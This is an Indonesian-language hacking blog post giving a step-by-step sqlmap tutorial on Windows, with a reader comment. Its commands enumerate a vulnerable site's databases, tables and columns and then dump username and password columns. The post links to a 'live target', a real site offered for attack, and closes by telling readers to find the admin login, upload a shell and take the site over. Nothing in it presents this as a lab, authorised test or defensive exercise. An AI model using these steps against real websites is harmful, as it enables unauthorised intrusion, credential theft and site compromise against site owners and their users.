Tutorial Menggunakan Sqlmap ( Windows )




ok gan back lagi bersama saya

kali ini gw disini mau kasih tutorial cara menggunakan sqlmap di windows
Sqlmap merupakan tools untuk mengscan / mencari vuln sqli injection pada sebuah website, sama seperti Havij

Hal 1 lo harus download dulu tools sqlmap nya di bawah ini
Klik Disini !!!
Klo udh di download, ekstrak di folder C:/


Next caranya

1. hal 1 lu harus ada target yg vuln terhadap sqli, klo ga ada nih gw ada live targetnya >> Klik Disini !!!

2. Buka CMD, lalu ketik 
cd c:/sqlmap



3. Ketik lagi
sqlmap.py -u target.com --dbs



4. Biarkan dia mengscan


Nah ini udh ketemu name DB nya


Selanjutnya ketik
sqlmap.py -u target.com -D namaDB-nya --tables


Biarkan dia mengscan , klo udh akan muncul tablesnya speri gmbr dibawah ini


Lalu pilih tables yg menurut lu isinya itu username & password
Lalu ketik
sqlmap.py -u target.com -D nama-DB -T userlogin --columns

biarkan dia mengscan, kalau sudah akan muncul seperti ini



Lalu ketik

sqlmap.py -u target.com -D nama-DB -T userlogin --columns -C Password,Username --dump

Biarkan dia mengscan,   Klo berhasil seperti ini


Congratulations yg gw tandain username & password udh di dapat, tinggal cari admin login > up shell > tebas awokowk

Ok sekian...
Terima kasih sudah berkunjung ke blog saya >_<
Next time gw akan share tools yg bermanfaat :v

~Admin.Ddy
ordinary people

1 comment

  1. thanks tutor nakalnya. wkwkwwkwkkw

    Salam

    Pongery.com
© Troll Your System. All rights reserved. Premium By Raushan Design